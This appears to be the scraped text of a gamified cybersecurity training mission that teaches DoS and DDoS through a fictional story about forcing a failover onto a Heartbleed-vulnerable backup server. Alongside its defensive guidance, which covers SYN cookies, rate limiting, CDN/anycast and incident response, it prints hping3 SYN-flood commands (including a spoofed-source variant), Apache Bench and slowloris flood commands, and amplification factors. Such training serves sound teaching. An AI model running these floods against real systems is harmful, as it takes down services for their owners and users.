«
◀
OP-22 // FLOOD GATE
CAMPAIGN 3 // THE GHOST PROTOCOL // DoS/DDoS
0
XP
T1
RANK
0%
DETECT
↻
RESET
CAMPAIGN 3 — THE GHOST PROTOCOL
DoS/DDoS // AVAILABILITY ATTACK // FAILOVER TRIGGER
OP-22
DENIAL OF SERVICE // DISTRIBUTED DoS
FLOOD GATE
TRAFFIC ANALYSIS · SERVER SIMULATOR · SCENARIO CLASSIFIER · INCIDENT TIMELINE
OPERATION FLOOD GATE — CAMPAIGN 3
🔌
SITUATION
64H 30M REMAINING
Op 21 mapped the Vantage infrastructure — the Syndicate’s trunk, racked on bulletproof iron in a Bucharest data-haven where Kane’s lawyers keep subpoenas at arm’s length. The primary auction platform runs on port 443. The backup node runs on port 8443 — older software, less hardened. Vantage's failover is automatic: if the primary goes unreachable for 45 consecutive seconds, all traffic reroutes to the backup.
MENDAX's logic is simple. Get Shadow onto the backup node, where the security is weaker. The backup node runs lighttpd 1.4.35 over OpenSSL 1.0.1f. That version of OpenSSL has a name.
Op 22 is not about destruction. It is about precision. Force the failover. Keep the backup alive. The work begins when Shadow is inside it.
MENDAX's logic is simple. Get Shadow onto the backup node, where the security is weaker. The backup node runs lighttpd 1.4.35 over OpenSSL 1.0.1f. That version of OpenSSL has a name.
Op 22 is not about destruction. It is about precision. Force the failover. Keep the backup alive. The work begins when Shadow is inside it.
WHAT IS A DoS ATTACK?
FEYNMAN PRIMER
Imagine a restaurant with limited tables. A group occupies all tables without ordering food. Real customers arrive but cannot get in. The system becomes unusable because it is fully occupied.
⚠ The difference between DoS and DDoS is the number of groups booking tables. One group from one location — DoS. Thousands of groups from thousands of locations simultaneously — DDoS. You cannot refuse one table of people without refusing everyone who looks like them.
VANTAGE SYSTEMS INTERNAL // BUSINESS CONTINUITY ASSESSMENT // 2022-03-14 // HOLT, M.
“The probability of a targeted availability attack against Vantage infrastructure is assessed as negligible given our non-public profile. Business continuity protocols exist for natural failure events only. Primary node disruption procedures have not been updated since 2019.”
◈ MENDAX: “He updated his threat model in 2022. He has not updated it since.”
MENDAX — DARK CHANNEL // OP-22 BRIEF
07:30
MENDAX
“The backup node. Port 8443. Flood the primary, force the failover, then let go — the second the backup wakes up it’s carrying the whole Syndicate auction on stale OpenSSL. Do not touch it. Precision, Shadow.”
Op 21 — SYN flood reconnaissance that mapped Vantage's active ports and exposed a half-open service on port 8443.
TARGET
nexus-web.nexus-global.int
IP ADDRESS
192.0.2.50 (external)
OS / SERVER
Ubuntu 22.04 · nginx 1.24 · No rate limiting · No CDN
KEY SERVICES
HTTP/443 frontend · No DDoS mitigation · Unprotected origin
ATTACK SCOPE
Simulated volumetric + Layer-7 flood in scope
ATTACKER NODE
shadow@sigma9 · 10.99.0.1
📋 ROOM TASKS
01
✓
Understand how DDoS degrades availability and masks simultaneous intrusions
02
▶
Launch the coordinated flood and observe service degradation
03
○
Classify DDoS mitigation techniques by effectiveness layer
04
○
Identify the fix (rate limiting + CDN + anycast scrubbing)
05
○
Submit the capture-the-flag token
CAPTURE THE FLAG
Complete the exploit lab. The flag appears below once Phase 2 is done. Copy and submit it here for +50 XP.
PHASE 01
DoS vs DDoS
CLASSIFY
SIGMA-9 CAPTURE LOG — HOW WE FOUND IT
02:47 UTC
> probing vantage-ops.net — single primary node behind a thin load balancer
> sustained SYN burst to :443 spiked latency from 40ms to 9000ms in under a second
> FOUND: no rate-limit, no SYN cookies, one origin server — flood it and it falls over to a warm standby
MENDAX: "One node carrying the whole site. We don't need a botnet for this — we need pressure."
MENDAX — HOW THIS IS ACTUALLY DONE
LIVE
MENDAX
First you generate raw SYN pressure — half-open connections the server has to hold open while it waits for a handshake that never finishes. Enough of them and the connection table fills.
$ sudo hping3 --flood -S -p 443 vantage-ops.net
# --flood: send as fast as possible, -S: SYN flag, no reply read
HPING vantage-ops.net (eth0): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
MENDAX
Then you stack an HTTP layer on top so even the requests that get through bury the app logic. Watch the primary's response time climb until it stops answering.
$ ab -n 100000 -c 1000 https://vantage-ops.net/
Failed requests: 41882
primary-01: DOWN ... failover → backup-02 (warm standby) ONLINE
MENDAX
Primary's down, the warm standby just activated exposed and unconfigured. That's our window. Your call, Shadow — how hard do we push?
💡 One source, one target = DoS. Many sources (a botnet), one target = DDoS. The difference changes everything about how you defend against it.
MENDAX
ENCRYPTED
Before you flood anything, understand what you are choosing to do — and what Vantage can do about it.
A DoS attack comes from one machine. Vantage's firewall can block a single IP in seconds. Mission over before it starts.
A DDoS uses a botnet — thousands of compromised machines across hundreds of countries, each sending a small amount of traffic. No single source looks suspicious. The combined load breaks the server. Vantage cannot block every country simultaneously.
Two questions below. Answer both to proceed.
A DoS attack comes from one machine. Vantage's firewall can block a single IP in seconds. Mission over before it starts.
A DDoS uses a botnet — thousands of compromised machines across hundreds of countries, each sending a small amount of traffic. No single source looks suspicious. The combined load breaks the server. Vantage cannot block every country simultaneously.
Two questions below. Answer both to proceed.
► QUESTION 1
Vantage detects a single IP address sending 50,000 SYN packets per second to port 443. They blackhole the IP. Attack traffic drops to zero. What type of attack was this?
✓
CORRECT — DoS, SINGLE SOURCE
One IP. One block. Attack ends. That is the weakness of DoS — it has a return address. DDoS has no single return address. That is why DDoS is harder to stop.
Why this matters for Op 22: Shadow is operating from a single source. If Vantage detects and blocks Shadow's IP mid-attack, the failover fails. The solution: a short, sharp flood that triggers failover in under 45 seconds, before the block takes effect.
✓
CORRECT — DDoS, DISTRIBUTED BOTNET
80,000 sources sending 200 packets each looks like normal traffic from each source individually. The flood is only visible in aggregate. Rate limiting per IP does nothing — no single IP triggers the threshold.
Key lesson: DDoS survives most per-IP defences. Mitigations require upstream traffic scrubbing, anycast distribution, or CDN absorption — not simple IP blocks. Op 22 Phase 4 covers these.
🔧 UNDER THE HOOD▼
THE ATTACK — STEP BY STEP
SYN flood — exhaust the server's connection table by sending thousands of TCP SYN packets without completing the handshake. The server holds each half-open connection in memory until timeout:
# SYN flood with hping3:
hping3 -S --flood -V -p 80 target.com
# -S = SYN flag, --flood = max rate, -p 80 = port 80
# Spoofed source IP SYN flood:
hping3 -S --flood -a SPOOFED_IP target.com
# HTTP flood (Layer 7) — overwhelms the application layer:
# Tools: slowloris, LOIC, ab (Apache Bench)
ab -n 1000000 -c 1000 http://target.com/
# Amplification DDoS — send small forged requests to open DNS resolvers,
# responses (50-100x larger) are sent to the victim's IP:
# 1 byte query → 4000 byte DNS response = 4000x amplification factor
COMMON VARIATIONS
1. DNS amplification — query open DNS resolvers for ANY records (large response) with the victim's IP as the source:
# Amplification factors by protocol:
# DNS: up to 100x
# NTP (monlist command): up to 556x
# SSDP (UPnP): up to 30x
# Memcached: up to 51,000x (CVE-2018-1000115)
2. Slowloris / slow HTTP attack — open many connections and send partial HTTP headers very slowly, keeping connections open without completing requests. Uses minimal bandwidth:slowloris target.com -p 80 -s 1000 --sleeptime 10
3. Application-layer DDoS — target expensive endpoints (search, login, report generation) that consume disproportionate server resources per request.HOW TO DEFEND
SYN cookies — the server doesn't allocate state for SYN packets until the handshake completes; the cookie encodes connection info in the SYN-ACK sequence number:
# Enable SYN cookies on Linux:
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
# Permanent (sysctl.conf):
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 2048
# Rate limiting with iptables:
iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j ACCEPT
iptables -A INPUT -p tcp --syn -j DROP
# Nginx rate limiting (Layer 7):
limit_req_zone $binary_remote_addr zone=login:10m rate=5r/m;
server {
location /login {
limit_req zone=login burst=10 nodelay;
}
}
For large-scale DDoS: route traffic through a CDN/scrubbing center (Cloudflare, Akamai). They absorb volumetric attacks with their global anycast network.PHASE 02
SERVER HEALTH SIMULATOR
SIMULATE
The vector is confirmed. Now comes the precision work — drive the primary to zero without touching the backup node it's about to inherit everything.
💡 Too slow = no failover. Too fast = backup saturated, mission fails. Find the threshold that forces failover without destroying the backup node.
MENDAX
ENCRYPTED
Vantage's primary node fails over automatically when health drops to zero for 45 consecutive seconds. The backup node is already running — you must not touch it. Watch both bars.
Set the attack parameters. Launch. Observe. If the IDS fires, or the backup saturates, abort and recalibrate. The goal is a clean failover, not a blackout.
Set the attack parameters. Launch. Observe. If the IDS fires, or the backup saturates, abort and recalibrate. The goal is a clean failover, not a blackout.
MISSION PARAMETERS
OBJECTIVE
Target: Reduce Vantage's primary node firewall health to 0% and hold it there for 45 consecutive seconds while keeping IDS detection below 60%.
Time window: 4 minutes before Vantage's automated failover locks Shadow out.
Distraction window: Opens when primary node reaches 0% health — Shadow needs 90 seconds inside the backup node. Do not saturate the backup.
Time window: 4 minutes before Vantage's automated failover locks Shadow out.
Distraction window: Opens when primary node reaches 0% health — Shadow needs 90 seconds inside the backup node. Do not saturate the backup.
PRIMARY NODE HEALTH
ONLINE
BACKUP NODE HEALTH
STANDBY — DO NOT TOUCH
VANTAGE IDS DETECTION
THRESHOLD: 70% — FIRES AT 90%
ALERT ZONE
ATTACK PARAMETERS
ATTACK TYPE
SYN FLOOD: sends half-open TCP connections. Server must hold each one in memory. Connection table fills before bandwidth runs out. Most efficient for this target.
PACKET RATE
30,000
pps
≈ 1.4 Mbps
5k25k50k75k100k
PACKET SIZE
52
bytes
typical SYN packet
40BTCP SYNUDPHTTP1460B MTU
TOTAL BANDWIDTH
1.4 Mbps
CONN TABLE LOAD
LOW
IDS RISK
LOW
▶ Set parameters above. Hit LAUNCH to begin the flood.
💡 MENDAX — FIELD NOTES (FREE)
✓
FAILOVER TRIGGERED — PHASE COMPLETE
Primary node unreachable. Vantage's automated failover activated. All auction platform traffic now routed through the backup node on port 8443.
What you learned: DoS is not about maximum destruction. It is about calibration. The right packet rate held the primary at zero for 45 seconds without saturating the backup. Precision is the weapon.
What you learned: DoS is not about maximum destruction. It is about calibration. The right packet rate held the primary at zero for 45 seconds without saturating the backup. Precision is the weapon.
SYN flood advantage: SYN packets are small (40–60 bytes) but require the server to allocate a connection entry for each one. At scale, the connection table fills before bandwidth is exhausted. Efficient and hard to distinguish from legitimate traffic spikes.
PHASE 03
TRAFFIC PATTERN READER
CLASSIFY
Failover is confirmed and the backup node is live. Vantage's incident team is already reading the same logs Shadow generated — learn to see what they see.
💡 Traffic patterns tell you what kind of event is happening. Sharp vertical spikes look different from DDoS floods. DDoS floods look different from gradual legitimate growth. Read the shape, not just the number.
MENDAX
ENCRYPTED
Vantage's incident team will be reviewing traffic logs from the last 24 hours. Six traffic events. Classify each one correctly — DoS attack, DDoS attack, or legitimate spike.
One at a time. Read the description. Read the graph shape. Classify. If you get it wrong, the reason why matters more than the answer.
One at a time. Read the description. Read the graph shape. Classify. If you get it wrong, the reason why matters more than the answer.
0 / 6 classified
✓
ALL 6 TRAFFIC PATTERNS CLASSIFIED
You can now read a network traffic graph and distinguish a DoS, DDoS, and a legitimate event. The shape of the traffic is the signature of the intent.
Key differences:
▪ DoS: single sharp spike from one source IP. Drops instantly when IP is blocked.
▪ DDoS: sustained high traffic across thousands of sources. Rate limiting per-IP has no effect.
▪ Legitimate spike: gradual rise, natural fall-off, organic distribution of source IPs.
Key differences:
▪ DoS: single sharp spike from one source IP. Drops instantly when IP is blocked.
▪ DDoS: sustained high traffic across thousands of sources. Rate limiting per-IP has no effect.
▪ Legitimate spike: gradual rise, natural fall-off, organic distribution of source IPs.
PHASE 04
INCIDENT TIMELINE
SEQUENCE
Traffic classified. Now step inside Vantage's operations centre — this is the exact sequence their team would run to fight back.
💡 A DDoS response has a fixed sequence. Skip a step and the attack continues. Do them out of order and you make things worse. Every second costs money.
MENDAX
ENCRYPTED
Vantage's incident response team will attempt to recover. These are the six steps they would take — in the wrong order.
Tap each event in the correct sequence from detection to recovery. Tap step 1 first, then 2, and so on. The sequence that a real security operations team follows.
Tap each event in the correct sequence from detection to recovery. Tap step 1 first, then 2, and so on. The sequence that a real security operations team follows.
PLACE EVENTS IN ORDER — TAP 1 THEN 2 THEN 3…
AVAILABLE EVENTS — TAP TO PLACE
💡 MENDAX — HINT (−20 XP)
Start with what a network monitoring system does first: it detects anomalous traffic. Everything else follows from that alert.
✓
INCIDENT TIMELINE — CORRECT SEQUENCE
This is the exact sequence that Vantage's incident team would follow. By the time they completed step 3 (null-routing Shadow's IP), the 45-second failover had already triggered.
The window: detection-to-null-route typically takes 3–8 minutes for a prepared team. A poorly prepared team (like Vantage, whose threat model was last updated in 2022) takes longer. Shadow had the time.
The window: detection-to-null-route typically takes 3–8 minutes for a prepared team. A poorly prepared team (like Vantage, whose threat model was last updated in 2022) takes longer. Shadow had the time.
⚠
OPERATION 22 — COMPLETE
FLOOD GATE — SUCCESS
PRIMARY NODE DOWN // FAILOVER TRIGGERED
+0
XP EARNED THIS OPERATION
Failover confirmed. Vantage Systems' primary node has been unreachable for 52 seconds. Their automated system routed all auction traffic to the backup node on port 8443.
The backup node runs lighttpd 1.4.35 over OpenSSL 1.0.1f. That version of OpenSSL was released in March 2012. A vulnerability was disclosed in April 2014 that allows any attacker to read 64 kilobytes of server memory per request — including private keys and session tokens.
Vantage patched the primary node. They never patched the backup. Holt's threat model did not include targeted attacks. His backup node was not a target. Until now.
The backup node runs lighttpd 1.4.35 over OpenSSL 1.0.1f. That version of OpenSSL was released in March 2012. A vulnerability was disclosed in April 2014 that allows any attacker to read 64 kilobytes of server memory per request — including private keys and session tokens.
Vantage patched the primary node. They never patched the backup. Holt's threat model did not include targeted attacks. His backup node was not a target. Until now.
MENDAX — DARK CHANNEL // POST-FLOOD GATE
07:53
MENDAX
“Failover confirmed. They are on the backup node. OpenSSL 1.0.1f. That version has a name.”
SHADOW
Heartbleed.
MENDAX
“They never patched it. Op 23.”
07:53 — DARK CHANNEL // SHADOW + MENDAX
SHADOW
Failover triggered at 07:48:22. Primary node still down. Backup is running clean.
MENDAX
Good. They will restore the primary within the hour. It does not matter. The window is open.
SHADOW
OpenSSL 1.0.1f on the backup. CVE-2014-0160. They know about Heartbleed.
MENDAX
They knew. They did not patch the backup. That is different. Op 23.
DEBRIEF — REFLECTION QUESTION
You overwhelmed the primary node and the backup came online with weaker defences. What should an organisation verify about its failover infrastructure — and how often?
SIGMA-9 ACADEMY
OPERATION 22 // DoS & DDoS // COMPLETE REFERENCE
◈ DoS vs DDoS — THE CORE DISTINCTION
DoS (Denial of Service): One machine sends enough traffic to overwhelm a target. Simple to execute. Equally simple to stop — block the source IP and the attack ends. Rarely effective against hardened targets.
DDoS (Distributed DoS): Thousands of machines — usually a botnet of compromised systems — each send a small amount of traffic. No single source looks suspicious. The combined load overwhelms the target. Blocking individual IPs is useless when there are 80,000 of them.
The key implication: DDoS requires a fundamentally different defence. Per-IP rate limiting fails. You need upstream scrubbing, anycast routing, or CDN absorption.
◈ ATTACK TYPES — SYN, UDP, HTTP
SYN Flood: Sends TCP SYN packets without completing the handshake. The server allocates a connection entry for each one. The connection table fills before bandwidth is exhausted. Efficient. Small packets, large impact.
UDP Flood: Sends large volumes of UDP packets to random ports. The server generates ICMP "destination unreachable" responses for each one. Bandwidth exhaustion. Can be amplified using DNS or NTP reflection.
HTTP Flood: Sends legitimate-looking HTTP GET or POST requests. Harder for simple filters to block. Exhausts web server worker threads. Requires application-layer defence (WAF, CAPTCHA, rate limiting).
◈ CALIBRATION — WHY PRECISION MATTERS
In Op 22, maximum attack volume would have saturated both the primary and the backup node. The backup becoming unreachable would have been a mission failure — Shadow needed the backup alive to work on it.
Real DDoS operations (both offensive and defensive) require calibration. The attacker who maxes their sliders often achieves less than the attacker who finds the threshold. The goal defines the tool settings.
◈ MITIGATIONS — WHAT ACTUALLY WORKS
Rate limiting: Limits the number of connections or requests from a single source per second. Effective against DoS. Ineffective against DDoS — each individual DDoS source may never hit the threshold.
CDN (Content Delivery Network): Distributes traffic across hundreds of edge servers globally. A volumetric flood that would destroy one server is absorbed across the network. The most common enterprise mitigation.
Anycast routing: Routes attack traffic to the nearest of many scrubbing centres. The attack is diluted across the network. Standard for large-scale DDoS mitigation (Cloudflare, Akamai).
SYN cookies: Eliminates the connection table allocation vulnerability in SYN floods. The server doesn't allocate state until the handshake completes. Most modern kernels have this enabled by default.
Null routing / blackholing: Drops all traffic destined for the attacked IP at the ISP level. Stops the attack instantly but also takes the target offline. A last resort.
❓
FIELD QUESTIONS — FLOOD GATE
Why is Vantage's backup node more valuable to Shadow than the primary?
The backup node runs OpenSSL 1.0.1f — a version containing CVE-2014-0160, known as Heartbleed. Vantage patched the primary node when Heartbleed was disclosed in 2014. The backup node was forgotten. A patched server is hardened. An unpatched backup running ten-year-old OpenSSL is an open door. Op 23 is about walking through it.
What is the 45-second failover threshold and why does it matter?
Vantage's infrastructure monitors primary node health. If the primary is unreachable for 45 consecutive seconds, the automated system reroutes all traffic to the backup. This is a standard enterprise high-availability pattern. The number matters because Shadow needs to hold the primary at zero health for exactly that duration — not for a moment, not for an hour. 45 seconds of precisely calibrated pressure.
What is a botnet and how does it enable DDoS?
A botnet is a network of computers compromised by malware and controlled remotely by an attacker (the "bot herder"). The owners of those machines have no idea they are participating in an attack. Botnets enable DDoS because each compromised machine sends only a small amount of traffic — indistinguishable from legitimate use. The DDoS only becomes visible in aggregate at the target. Blocking individual sources is impossible at scale.
Why did Holt's threat model fail?
Holt's 2022 memo assessed the probability of a targeted availability attack as "negligible given our non-public profile." He made the same mistake he made about port scanning in Op 21: he confused address privacy with system security. The backup node's IP was not public. Shadow had it from Op 21's port scan. Once you have the address, the non-public profile is no protection at all. Holt updated his threat model in 2022. He had not updated it since. Three years in cybersecurity is a generation.
REAL-WORLD TOOLS — AVAILABILITY & RESILIENCE
WHAT PROFESSIONALS USE
⚡
hping3
FREE / OPEN SOURCE
Crafted-packet generator used in authorised load/resilience testing to validate rate limits and failover behaviour.
hping3 -S -p 443 --flood target.lab
📊
Apache Bench (ab)
FREE / OPEN SOURCE
Generates measured HTTP load to confirm a service degrades gracefully and backups come online cleanly.
ab -n 100000 -c 1000 https://target.lab/
🔬
Cloudflare / WAF
FREE TIER
The defence: rate limiting, traffic shaping and an upstream WAF absorb floods so the origin stays available.
rules: rate_limit(100/min) per-IP
LEAVE MISSION?
Progress is saved. You can resume from the mission select screen at any time.
RESET MISSION?
This wipes all progress for this operation only. XP in other operations is unaffected.
ARE YOU SURE?
Final confirmation -- all progress for this operation will be permanently erased.